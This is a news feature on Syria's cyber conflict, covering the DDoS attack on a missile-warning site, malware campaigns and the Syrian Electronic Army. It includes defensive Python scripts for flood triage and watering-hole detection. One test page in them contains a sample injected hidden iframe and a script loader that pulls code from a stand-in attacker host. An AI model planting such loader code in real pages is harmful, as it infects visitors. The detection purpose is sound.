Syria’s Online Conflict: The Hackers And Their Weapons


Attacks on missile warning services, sophisticated malware campaigns and the Syrian Electronic Army make for a chaotic cyber conflict, TechWeek finds

Cyber Repression: In Western consciousness, there is one name that immediately comes to mind when thinking about Syria’s cyber conflict – the Syrian Electronic Army. That’s because many of its targets have been Western media organisations helping mould the minds of the people. But the online war is vast and complex. Some attacks have far more serious ramifications than the defacements and Twitter account hijacks that make headlines almost every week.

For two days last month, a website designed to warn Syrians about incoming Scud missiles was taken offline by a massive distributed denial of service (DDoS) attack. The founder of the site, Dlshad Othman, tells me he was up from 6pm on 9 July until 4am the next morning manually blocking the IP addresses used in the attack. “I then raised a white flag. I couldn’t handle it anymore,” he says.

Botnet knocks missile warning site offline

Once he had brought in analysts from VirtualRoad.org, which provides security for human rights organisations, they determined that 10,000 bots were used in the assault on the Aymta website (the name translates to “when” in Arabic). Most of the IP addresses were in former Soviet states, including Russia and Ukraine; some were in Iran. Othman is certain a nation state sponsored the DDoS, and he suspects the government of President Bashar al-Assad. “This is government attacking – it’s not small private organisations,” he says. “I’ve been doing IT stuff for 10 years – I’ve never seen an attack like this.”

DDoS is usually just an annoyance, but in cases such as this it can have profound real-world effects. Launched in late June, Aymta lets a small set of trusted sources inside Syria share information securely about Scud launches and their likely targets. Once launched, these missiles are easily visible to people inside the war-torn country, yet they have still killed hundreds, possibly thousands. The Scud threat data is then disseminated by text message, email and RSS feed, or broadcast on satellite TV and radio stations not controlled by the state (a smartphone application is coming soon too). A map also estimates which area the Scud is flying over, so that users can organise effective evacuations. If the site goes down, it could mean the difference between life and death.

Othman, a systems engineer with a passion for human rights, says 3,000 people have already registered for the text updates. He believes more will join and, now that he hosts the site on a properly scalable cloud service, he hopes it will stay up. In a country that has now seen more than 100,000 deaths as a result of the civil war, many will be hoping the site doesn’t just stay online but expands as quickly as possible.

The National Coalition for the Forces of the Revolution and the Syrian Opposition also had its official website, etilaf.org, knocked offline by a DDoS last month. The site was down for a day, says Tarek al-Jazairi, new media consultant for the Syrian National Coalition, who claims many of the IPs used in the attack came from Russia and Iran, possibly linking it with the hit on Aymta. Given that the site is used to spread information to supporters, it is an obvious target. Information is particularly valuable in wartime, which makes denying it a correspondingly powerful weapon.
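Othman’s night of blocking addresses by hand illustrates why per-IP blocking is a losing game against 10,000 bots. The script below is an added illustration, not code from Aymta or VirtualRoad.org: it parses web-server access-log lines, flags hosts that exceed a per-IP rate in a sliding window, then looks for the low-and-slow bots that a per-IP limit never catches (many distinct addresses sending the same request line and User-Agent at a polite rate), and emits ipset entries rather than one firewall rule per address. The log lines are constructed (RFC 5737 documentation addresses) and the thresholds and set name are assumptions.

```python
"""Triage an access log during an HTTP flood: loud bots by per-IP rate,
quiet bots by shared request signature, blocklist via ipset.
Added illustration; log data is constructed, thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined Log Format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log(text):
    """Parse Combined Log Format lines; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            entries.append(e)
    return entries


def rate_offenders(entries, window_s=10, limit=20):
    """{ip: peak_count} for IPs with more than `limit` requests inside any
    `window_s`-second sliding window. Catches loud bots only."""
    times_by_ip = defaultdict(list)
    for e in entries:
        times_by_ip[e["ip"]].append(e["ts"])
    offenders = {}
    for ip, times in times_by_ip.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):
            while (t - times[lo]).total_seconds() > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > limit:
            offenders[ip] = peak
    return offenders


def signature_clusters(entries, min_sources=8):
    """Group by (request line, User-Agent). One signature arriving from many
    distinct addresses, each at a low rate, is the fingerprint of a
    distributed flood that per-IP limits miss."""
    ips_by_sig = defaultdict(set)
    for e in entries:
        ips_by_sig[(e["req"], e["ua"])].add(e["ip"])
    return {sig: ips for sig, ips in ips_by_sig.items() if len(ips) >= min_sources}


def block_commands(ips, setname="flood_block"):
    """ipset entries: one hash lookup in the kernel instead of thousands of
    iptables rules. Assumes `ipset create flood_block hash:ip` was run."""
    return [f"ipset add {setname} {ip} -exist" for ip in sorted(ips)]


def triage(log_text):
    entries = parse_log(log_text)
    loud = rate_offenders(entries)
    quiet = set().union(*signature_clusters(entries).values())
    return {"entries": len(entries), "loud": loud, "quiet": quiet,
            "commands": block_commands(set(loud) | quiet)}


def _line(ip, t, req, ua):
    return f'{ip} - - [{t:%d/%b/%Y:%H:%M:%S %z}] "{req}" 200 512 "-" "{ua}"'


def build_sample_log():
    """Constructed traffic: one human, one loud bot, a dozen quiet bots."""
    t0 = datetime(2013, 7, 9, 18, 0, 0, tzinfo=timezone.utc)
    ff = "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/22.0"
    old = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    lines = []
    for i, req in enumerate(["GET / HTTP/1.1", "GET /map HTTP/1.1", "GET /feed HTTP/1.1"]):
        lines.append(_line("198.51.100.7", t0 + timedelta(seconds=30 * i), req, ff))
    for i in range(40):  # loud bot: 40 hits in under 4 seconds
        lines.append(_line("203.0.113.10", t0 + timedelta(milliseconds=100 * i), "GET / HTTP/1.1", ff))
    for n in range(12):  # quiet bots: 2 hits each, a minute apart, identical signature
        for k in range(2):
            lines.append(_line(f"192.0.2.{n + 1}", t0 + timedelta(seconds=5 * n + 60 * k),
                               "GET /index.php?x=1 HTTP/1.0", old))
    return "\n".join(lines)


if __name__ == "__main__":
    r = triage(build_sample_log())
    print(f"{r['entries']} requests; loud={sorted(r['loud'])}; quiet={len(r['quiet'])} hosts")
    print("\n".join(r["commands"]))
```

Even with both heuristics, a botnet that rotates addresses and randomises request signatures will outrun a single host; the realistic answer is what Othman eventually did, moving the site behind capacity that absorbs the flood upstream.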

Malware menace

Outside of DDoS strikes, the opposition’s enemies have shown off many other offensive skills this year. Citizen Lab spotted two attacks in mid-June. The first saw malware implanted into a legitimate circumvention proxy tool called Freegate, which opposition activists were using to avoid snooping by the regime. Hackers infiltrated a private social media group to spread the booby-trapped software, which carried a remote access Trojan of the kind commonly seen in government-backed surveillance operations. It logs keystrokes, can switch on the victim’s webcam and steals files.

The second campaign was spear phishing: emails apparently targeting high-level members of the Syrian opposition carried links that led to a malware infection if the recipient clicked through. The malware reported to a command and control server in Syria, on a SyriaTel IP address. SyriaTel is a telecoms company owned by Rami Makhlouf, a cousin of President Bashar al-Assad, who has previously been linked with the Syrian Electronic Army.

Other malware campaigns were spotted throughout 2012, including one that used a fake YouTube site and Adobe Flash Player update to get nasty software onto target machines. A site simply known as Syrian Malware now tracks attacks.

Syrian Electronic Army

Then there is the omnipresent Syrian Electronic Army, with its mass defacements, Twitter hijacks and more. A spokesperson for the Syrian Electronic Army tells TechWeek the group does use malware, usually in watering hole campaigns. “Sometimes we inject a code in some page and let the target visit it. That will run the malware and send the stored passwords in his PC to a website belonging to SEA,” they say. Perhaps they were responsible for the campaigns above, even if they won’t admit it, but the spokesperson denies the group does any DDoSing.
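The technique the spokesperson describes, injecting code into a page the target already visits, leaves a footprint that a site owner can check for. The script below is an added illustration (not SEA tooling and not any site’s real code): it extracts the active content of a page, meaning external script, frame and object sources plus the SHA-256 of each inline script, and diffs it against a known-good baseline copy, flagging new sources on hosts outside an allowlist and any new inline script. The HTML, hostnames and allowlist are constructed.

```python
"""Watering-hole check: diff a page's active content against a baseline.
Added illustration; the HTML and hosts below are constructed."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ActiveContent(HTMLParser):
    """Collect external script/frame/object sources and inline script hashes."""

    def __init__(self):
        super().__init__()
        self.sources = set()   # src/data URLs that load remote active content
        self.inline = set()    # sha256 of each non-empty inline <script> body
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.sources.add(a["src"])
            else:
                self._in_script, self._buf = True, []
        elif tag in ("iframe", "frame", "embed") and a.get("src"):
            self.sources.add(a["src"])
        elif tag == "object" and a.get("data"):
            self.sources.add(a["data"])

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.add(hashlib.sha256(body.encode()).hexdigest())


def extract(html):
    p = ActiveContent()
    p.feed(html)
    p.close()
    return p.sources, p.inline


def host_of(url, page_host):
    """Host a source resolves to; relative and scheme-relative URLs handled."""
    return (urlsplit(url).netloc or page_host).lower()


def audit(page_html, baseline_html, page_host, allowed_hosts):
    """Return (severity, description) findings for active content that is in
    the live page but not in the baseline. Unchanged content is not reported."""
    cur_src, cur_inline = extract(page_html)
    base_src, base_inline = extract(baseline_html)
    findings = []
    for src in sorted(cur_src - base_src):
        h = host_of(src, page_host)
        sev = "medium" if h in allowed_hosts else "high"
        findings.append((sev, f"new external source {src} (host {h})"))
    for digest in sorted(cur_inline - base_inline):
        findings.append(("high", f"new inline script sha256:{digest[:16]}"))
    return findings


# Constructed pages: the baseline as deployed, and the same page after injection.
BASELINE = """<html><head>
<script src="/static/app.js"></script>
<script>var section = 'news';</script>
</head><body><p>Headlines</p></body></html>"""

INJECTED = BASELINE.replace("</body>", """
<script src="//cdn.example/jquery.js"></script>
<iframe src="http://203.0.113.5/x.html" width="1" height="1"></iframe>
<script>var s=document.createElement('script');s.src='http://203.0.113.5/s.js';document.head.appendChild(s);</script>
</body>""")

PAGE_HOST = "news.example"
ALLOWED = {"news.example", "cdn.example"}

if __name__ == "__main__":
    for sev, msg in audit(INJECTED, BASELINE, PAGE_HOST, ALLOWED):
        print(f"[{sev}] {msg}")
```

Two caveats for anyone running this for real: fetch the page the way the intended victim would (the injected code may be served only to certain client addresses or user agents), and a diff of the static HTML cannot see what a compromised first-party script adds at runtime, so pair it with a check of the referenced script files themselves.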

Affiliated groups may be doing that, however. A group called Syrian Hackers School was running a Facebook page back in 2011 that disseminated denial of service (DoS) software designed to target media organisation websites (TechWeek could not find the page at the time of publication).


The SEA spokesperson denies claims, repeated by the Coalition’s al-Jazairi, that the group is financially supported by Makhlouf, the owner of SyriaTel and cousin of Bashar al-Assad, and that it operates out of an office block in Dubai. “We are based in Syria… A huge number of Syrians volunteered in the SEA, you can say thousands.” There is still no concrete evidence linking the SEA to the President’s regime, even though Bashar al-Assad expressed support for the group’s actions back in 2011.

The SEA spokesperson claims the group started out by attacking Syrian opposition websites, Facebook pages and Twitter. “But we found out that they are just puppets controlled by their owners, so we started targeting their bosses like Qatar, Saudi Arabia, America.” They are also keen on attacking Israeli sites, in support of their “Palestinian brothers”, and British media organisations. Every week, it compromises social media accounts and defaces websites to spread its messages of support for President Bashar al-Assad.

The Army appears to have plenty of support from a wide range of other cyber groups. These include the Yemen Hackers, the Muslim Hackers and the Arab Hackers For Free Palestine, as well as the Syrian Hackers School.

Limited rebel power?

As for the SEA’s enemies, they appear to be disparate, mirroring the physical conflict, and comparatively limited in their capabilities. The SEA says it doesn’t see much offensive work from its opponents.

One new group, the Al-Nusra Electronic Army, which is believed to have affiliations with the rebel Al-Nusra Front, itself thought to be an arm of Al Qaeda, has been busy of late, however. It defaced the Syrian Commission on Financial Markets and Securities earlier this month and did the same to the Russian government in March. The below images show the two defacements:

[Images: the two Al-Nusra Electronic Army defacements]

Another group, the Pirates of Aleppo, now operates in Turkey, near the Syrian border. It was established by a former SEA employee, working alongside another collective, the Falcons of Damascus. The Pirates’ leader, Ahmed Hiedar, told the Global Post earlier this year that the group had hacked into live state television broadcasts 13 times.

Sectarian schisms and regime rule

Helmi Noman, senior researcher at Citizen Lab, is concerned about the increasingly sectarian aspect of the cyber conflict, which stretches back to the start of the war. The schism between the Shia and Sunni branches of Islam has become ever more apparent across Syria, with the regime’s Alawite Shi’ite sect battling various Sunni groups. “The ideological identity of such warriors is visible on the defacement messages they leave on some of the compromised websites. In September 2011, for example, hackers defaced a Syrian website devoted to Grand Ayatollah Khamenei, the Supreme Leader of Iran and figurehead of the Shi’ite Muslim conservative establishment,” Noman tells TechWeek.

“The defacement was dedicated to the ‘revolutionaries among the Syrian people’ and the ‘martyrs of Syria’, but more importantly it said, ‘Syria will remain a castle of Ahl Al-Sunnah’, an Arabic term meaning Sunni community. It added that ‘Iran’s dogs will be relegated to the garbage heap of history’.”

Power is another issue. As the regime has control over much of the nation’s critical infrastructure, organised power outages are frequent, Noman says. The major national Internet outages have gained plenty of press, but the localised power outages that knock out all forms of electronic communications cause big problems. “There is a serious electricity problem, which results in a lack of telecoms, not just the Internet,” Noman adds.

ISPs are also closely tied to the government, which means man-in-the-middle snooping and other network-level attacks are used frequently, according to Othman. Such control over content, not just on the Internet but across all forms of media, also helps the regime push its propaganda campaigns.

In Syria’s online conflict, the regime certainly has the upper hand.

This article is part of TechWeek’s Cyber Repression Series. Click through for other articles on attacks stemming from China on spiritual activists and military bodies, IP tracking in Bahrain, attacks surrounding the Zimbabwean election, and strikes on the Tibetan community, which is getting little help from the security community.
